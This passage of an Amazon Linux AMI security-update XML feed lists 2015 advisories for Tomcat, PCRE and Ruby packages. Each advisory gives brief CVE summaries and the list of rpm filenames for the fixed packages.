arch="i686"><filename>Packages/php-dba-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-tidy-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-recode" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-recode-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-mysqlnd" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-enchant" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-enchant-5.3.29-1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-525</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-525: medium priority package update for tomcat6</title><issued date="2015-05-14 14:33:00" /><updated date="2015-05-14 23:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0227:
It was discovered that the ChunkedInputFilter in Tomcat did not fail subsequent attempts to read input after malformed chunked encoding was detected. A remote attacker could possibly use this flaw to make Tomcat process part of the request body as new request, or cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0227" title="" id="CVE-2014-0227" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0991.html" title="" id="RHSA-2015:0991" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-docs-webapp" version="6.0.43" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.43-1.2.amzn1.noarch.rpm</filename></package><package name="tomcat6-admin-webapps" version="6.0.43" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.43-1.2.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.43" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.43-1.2.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.43" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.43-1.2.amzn1.noarch.rpm</filename></package><package name="tomcat6-webapps" version="6.0.43" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.43-1.2.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.43" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.43-1.2.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.43" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.43-1.2.amzn1.noarch.rpm</filename></package><package name="tomcat6-el-2.1-api" version="6.0.43" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.43-1.2.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.43" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.43-1.2.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-526</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-526: medium priority package update for tomcat7</title><issued date="2015-05-14 14:38:00" /><updated date="2015-05-14 23:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0227:
It was discovered that the ChunkedInputFilter in Tomcat did not fail subsequent attempts to read input after malformed chunked encoding was detected. A remote attacker could possibly use this flaw to make Tomcat process part of the request body as new request, or cause a denial of service.
1109196:
CVE-2014-0227 Tomcat/JBossWeb: request smuggling and limited DoS in ChunkedInputFilter
CVE-2014-0099:
It was found that JBoss Web / Apache Tomcat did not check for overflowing values when parsing request content length headers. A remote attacker could use this flaw to perform an HTTP request smuggling attack on a JBoss Web / Apache Tomcat server located behind a reverse proxy that processed the content length header correctly.
1102030:
CVE-2014-0099 Tomcat/JBossWeb: Request smuggling via malicious content length header
CVE-2014-0096:
It was found that the org.apache.catalina.servlets.DefaultServlet implementation in JBoss Web / Apache Tomcat allowed the definition of XML External Entities (XXEs) in provided XSLTs. A malicious application could use this to circumvent intended security restrictions to disclose sensitive information.
1088342:
CVE-2014-0096 Tomcat/JBossWeb: XXE vulnerability via user supplied XSLTs
CVE-2014-0075:
It was discovered that JBoss Web / Apache Tomcat did not limit the length of chunk sizes when using chunked transfer encoding. A remote attacker could use this flaw to perform a denial of service attack against JBoss Web / Apache Tomcat by streaming an unlimited quantity of data, leading to excessive consumption of server resources.
1072776:
CVE-2014-0075 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding input filter
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0075" title="" id="CVE-2014-0075" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0096" title="" id="CVE-2014-0096" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0099" title="" id="CVE-2014-0099" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0227" title="" id="CVE-2014-0227" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-admin-webapps" version="7.0.59" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.59-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.59" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.59-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.59" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.59-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.59" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.59-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.59" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.59-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.59" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.59-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.59" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.59-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.59" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.59-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.59" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.59-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.59" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.59-1.8.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-527</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-527: medium priority package update for tomcat8</title><issued date="2015-05-14 14:40:00" /><updated date="2015-05-14 23:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0227:
It was discovered that the ChunkedInputFilter in Tomcat did not fail subsequent attempts to read input after malformed chunked encoding was detected. A remote attacker could possibly use this flaw to make Tomcat process part of the request body as new request, or cause a denial of service.
1109196:
CVE-2014-0227 Tomcat/JBossWeb: request smuggling and limited DoS in ChunkedInputFilter
CVE-2014-0099:
It was found that JBoss Web / Apache Tomcat did not check for overflowing values when parsing request content length headers. A remote attacker could use this flaw to perform an HTTP request smuggling attack on a JBoss Web / Apache Tomcat server located behind a reverse proxy that processed the content length header correctly.
1102030:
CVE-2014-0099 Tomcat/JBossWeb: Request smuggling via malicious content length header
CVE-2014-0096:
It was found that the org.apache.catalina.servlets.DefaultServlet implementation in JBoss Web / Apache Tomcat allowed the definition of XML External Entities (XXEs) in provided XSLTs. A malicious application could use this to circumvent intended security restrictions to disclose sensitive information.
1088342:
CVE-2014-0096 Tomcat/JBossWeb: XXE vulnerability via user supplied XSLTs
CVE-2014-0075:
It was discovered that JBoss Web / Apache Tomcat did not limit the length of chunk sizes when using chunked transfer encoding. A remote attacker could use this flaw to perform a denial of service attack against JBoss Web / Apache Tomcat by streaming an unlimited quantity of data, leading to excessive consumption of server resources.
1072776:
CVE-2014-0075 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding input filter
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0075" title="" id="CVE-2014-0075" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0096" title="" id="CVE-2014-0096" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0099" title="" id="CVE-2014-0099" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0227" title="" id="CVE-2014-0227" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-admin-webapps" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.20-1.53.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.20-1.53.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.20-1.53.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.20-1.53.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.20-1.53.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.20-1.53.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.20-1.53.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.20-1.53.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.20-1.53.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.20-1.53.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-528</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-528: low priority package update for pcre</title><issued date="2015-05-27 14:03:00" /><updated date="2015-05-27 15:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8964:
A flaw was found in the way PCRE handled certain malformed regular expressions. This issue could cause an application (for example, Konqueror) linked against PCRE to crash while parsing malicious regular expressions.
1166147:
CVE-2014-8964 pcre: incorrect handling of zero-repeat assertion conditions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8964" title="" id="CVE-2014-8964" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pcre-static" version="8.21" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-static-8.21-7.7.amzn1.x86_64.rpm</filename></package><package name="pcre" version="8.21" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-8.21-7.7.amzn1.x86_64.rpm</filename></package><package name="pcre-debuginfo" version="8.21" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-debuginfo-8.21-7.7.amzn1.x86_64.rpm</filename></package><package name="pcre-devel" version="8.21" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-devel-8.21-7.7.amzn1.x86_64.rpm</filename></package><package name="pcre-tools" version="8.21" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-tools-8.21-7.7.amzn1.x86_64.rpm</filename></package><package name="pcre-devel" version="8.21" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-devel-8.21-7.7.amzn1.i686.rpm</filename></package><package name="pcre-debuginfo" version="8.21" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-debuginfo-8.21-7.7.amzn1.i686.rpm</filename></package><package name="pcre-static" version="8.21" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-static-8.21-7.7.amzn1.i686.rpm</filename></package><package name="pcre-tools" version="8.21" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-tools-8.21-7.7.amzn1.i686.rpm</filename></package><package name="pcre" version="8.21" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-8.21-7.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-529</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-529: medium priority package update for ruby18</title><issued date="2015-05-27 14:05:00" /><updated date="2015-05-27 15:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1855:
1209981:
CVE-2015-1855 ruby: OpenSSL extension hostname matching implementation violates RFC 6125
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1855" title="" id="CVE-2015-1855" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby18-debuginfo" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby18-debuginfo-1.8.7.374-2.42.4.amzn1.x86_64.rpm</filename></package><package name="ruby18-static" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby18-static-1.8.7.374-2.42.4.amzn1.x86_64.rpm</filename></package><package name="ruby18" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby18-1.8.7.374-2.42.4.amzn1.x86_64.rpm</filename></package><package name="ruby18-devel" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby18-devel-1.8.7.374-2.42.4.amzn1.x86_64.rpm</filename></package><package name="ruby18-libs" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby18-libs-1.8.7.374-2.42.4.amzn1.x86_64.rpm</filename></package><package name="ruby18-ri" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby18-ri-1.8.7.374-2.42.4.amzn1.x86_64.rpm</filename></package><package name="ruby18-irb" version="0.9.5" release="2.42.4.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby18-irb-0.9.5-2.42.4.amzn1.noarch.rpm</filename></package><package name="ruby18-rdoc" version="1.0.1" release="2.42.4.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby18-rdoc-1.0.1-2.42.4.amzn1.noarch.rpm</filename></package><package name="ruby18-static" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby18-static-1.8.7.374-2.42.4.amzn1.i686.rpm</filename></package><package name="ruby18-libs" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby18-libs-1.8.7.374-2.42.4.amzn1.i686.rpm</filename></package><package name="ruby18-ri" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby18-ri-1.8.7.374-2.42.4.amzn1.i686.rpm</filename></package><package name="ruby18-debuginfo" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby18-debuginfo-1.8.7.374-2.42.4.amzn1.i686.rpm</filename></package><package name="ruby18-devel" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby18-devel-1.8.7.374-2.42.4.amzn1.i686.rpm</filename></package><package name="ruby18" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby18-1.8.7.374-2.42.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-530</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-530: medium priority package update for ruby19</title><issued date="2015-05-27 14:05:00" /><updated date="2015-05-27 15:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1855:
1209981:
CVE-2015-1855 ruby: OpenSSL extension hostname matching implementation violates RFC 6125
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1855" title="" id="CVE-2015-1855" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems19-devel" version="1.8.23.2" release="32.66.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-devel-1.8.23.2-32.66.amzn1.noarch.rpm</filename></package><package name="ruby19" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-1.9.3.551-32.66.amzn1.x86_64.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-debuginfo-1.9.3.551-32.66.amzn1.x86_64.rpm</filename></package><package name="ruby19-irb" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby19-irb-1.9.3.551-32.66.amzn1.noarch.rpm</filename></package><package name="ruby19-doc" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-doc-1.9.3.551-32.66.amzn1.x86_64.rpm</filename></package><package name="rubygems19" version="1.8.23.2" release="32.66.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-1.8.23.2-32.66.amzn1.noarch.rpm</filename></package><package name="ruby19-devel" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-devel-1.9.3.551-32.66.amzn1.x86_64.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="32.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-io-console-0.3-32.66.amzn1.x86_64.rpm</filename></package><package name="rubygem19-rdoc" version="3.9.5" release="32.66.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rdoc-3.9.5-32.66.amzn1.noarch.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="32.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-bigdecimal-1.1.0-32.66.amzn1.x86_64.rpm</filename></package><package name="rubygem19-minitest" version="2.5.1" release="32.66.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-minitest-2.5.1-32.66.amzn1.noarch.rpm</filename></package><package name="rubygem19-rake" version="0.9.2.2" release="32.66.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rake-0.9.2.2-32.66.amzn1.noarch.rpm</filename></package><package name="ruby19-libs" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-libs-1.9.3.551-32.66.amzn1.x86_64.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="32.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-json-1.5.5-32.66.amzn1.x86_64.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="32.66.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-json-1.5.5-32.66.amzn1.i686.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-debuginfo-1.9.3.551-32.66.amzn1.i686.rpm</filename></package><package name="ruby19-libs" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-libs-1.9.3.551-32.66.amzn1.i686.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="32.66.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-bigdecimal-1.1.0-32.66.amzn1.i686.rpm</filename></package><package name="ruby19" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-1.9.3.551-32.66.amzn1.i686.rpm</filename></package><package name="ruby19-doc" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-doc-1.9.3.551-32.66.amzn1.i686.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="32.66.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-io-console-0.3-32.66.amzn1.i686.rpm</filename></package><package name="ruby19-devel" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-devel-1.9.3.551-32.66.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-531</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-531: medium priority package update for ruby20</title><issued date="2015-05-27 14:05:00" /><updated date="2015-05-27 15:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1855:
1209981:
CVE-2015-1855 ruby: OpenSSL extension hostname matching implementation violates RFC 6125
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1855" title="" id="CVE-2015-1855" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby20-debuginfo" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.645-1.25.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-1.25.amzn1.x86_64.rpm</filename></package><package name="ruby20" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.645-1.25.amzn1.x86_64.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.25.amzn1.x86_64.rpm</filename></package><package name="ruby20-doc" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.645-1.25.amzn1.noarch.rpm</filename></package><package name="ruby20-irb" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.645-1.25.amzn1.noarch.rpm</filename></package><package name="ruby20-devel" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.645-1.25.amzn1.x86_64.rpm</filename></package><package name="rubygems20" version="2.0.14" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14-1.25.amzn1.noarch.rpm</filename></package><package name="ruby20-libs" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.645-1.25.amzn1.x86_64.rpm</filename></package><package name="rubygems20-devel" version="2.0.14" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14-1.25.amzn1.noarch.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-1.25.amzn1.x86_64.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.25.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-1.25.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.645-1.25.amzn1.i686.rpm</filename></package><package name="ruby20-libs" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.645-1.25.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.645-1.25.amzn1.i686.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-1.25.amzn1.i686.rpm</filename></package><package name="ruby20" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.645-1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-532</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-532: medium priority package update for ruby21</title><issued date="2015-05-27 14:06:00" /><updated date="2015-05-27 15:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1855:
1209981:
CVE-2015-1855 ruby: OpenSSL extension hostname matching implementation violates RFC 6125
